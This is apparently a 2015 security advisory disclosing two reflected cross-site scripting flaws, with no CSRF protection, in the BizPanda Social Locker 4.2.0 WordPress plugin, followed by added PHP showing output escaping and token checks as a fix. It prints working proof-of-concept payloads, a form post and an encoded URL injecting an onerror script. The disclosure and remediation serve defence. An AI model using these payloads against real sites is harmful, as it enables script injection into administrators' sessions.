Subject: Cross-Site Scripting (XSS) in Social Locker | BizPanda 4.2.0
Date: Tue, 25 Aug 2015 12:41:37 +0200

Hello,

Plugin: Social Locker | BizPanda 4.2.0 https://wordpress.org/plugins/social-locker/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code (there is no CSRF protection!).

Method: POST
Url: http://localhost/wp-admin/edit.php?post_type=opanda-item&page=license-manager-sociallocker-next
Vulnerable parameters: licensekey

Example PHP callstack:
OnpLicensing325_LicenseManagerPage::indexAction   [/social-locker/bizpanda/libs/onepress/licensing/includes/license-manager.class.php:334]


Verification:
--
<form method="POST" action="http://localhost/wp-admin/edit.php?post_type=opanda-item&page=license-manager-sociallocker-next">
<input type="text" name="licensekey" value='"><img src=x onerror=alert(1) />' />
<input type="submit" name="submit" />
</form>
--


2. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code (there is no CSRF protection!).

Method: GET
Url: http://localhost/wp-admin/edit.php?post_type=opanda-item&page=leads-bizpanda&s=1&opanda_status=[xss]
Vulnerable parameters: opanda_status

Example PHP callstack:
OPanda_LeadsListTable::search_box   [/social-locker/bizpanda/admin/includes/classes/class.leads.table.php:78]

Verification:
http://localhost/wp-admin/edit.php?post_type=opanda-item&page=leads-bizpanda&s=1&opanda_status=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--
Regards,
Marcin Probola,
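
Both findings above come down to a request parameter being written back into the admin page without output encoding, by handlers that accept requests carrying no anti-CSRF token. The PHP below is an added example, not the plugin's code or a vendor fix. It assumes the value lands in a double-quoted attribute (as the `">` prefix of the verification payload suggests), and its function names are hypothetical plain-PHP stand-ins for WordPress's esc_attr(), wp_create_nonce() and check_admin_referer().

```php
<?php
// Added example, not BizPanda code. All function names here are hypothetical.

// Stand-in for esc_attr(): encode a value for an HTML attribute context.
function attr_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Assumed "before": the request value is echoed raw into value="...".
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// "After": the same field with every reflected value escaped on output.
function render_field_safe(string $name, string $value): string
{
    return '<input type="text" name="' . attr_escape($name)
         . '" value="' . attr_escape($value) . '" />';
}

// Stand-in for wp_create_nonce(): a token bound to a per-session secret
// and to the action it authorises.
function make_token(string $secret, string $action): string
{
    return hash_hmac('sha256', $action, $secret);
}

// Stand-in for check_admin_referer(): constant-time token comparison.
function token_is_valid(string $secret, string $action, string $submitted): bool
{
    return hash_equals(make_token($secret, $action), $submitted);
}

// Constructed sample input: the payload from the Verification sections.
$payload = '"><img src=x onerror=alert(1) />';
$secret  = 'constructed-per-session-secret';
$action  = 'save-license';

// Raw reflection closes the attribute; the escaped form stays inside it.
echo render_field_unsafe('licensekey', $payload), PHP_EOL;
echo render_field_safe('licensekey', $payload), PHP_EOL;

// A cross-site form post cannot supply the token, so the handler rejects it.
var_dump(token_is_valid($secret, $action, ''));
var_dump(token_is_valid($secret, $action, make_token($secret, $action)));
```

The same escaping applies to the `opanda_status` value in the second finding, and the token check belongs at the top of each handler, before any request parameter is read.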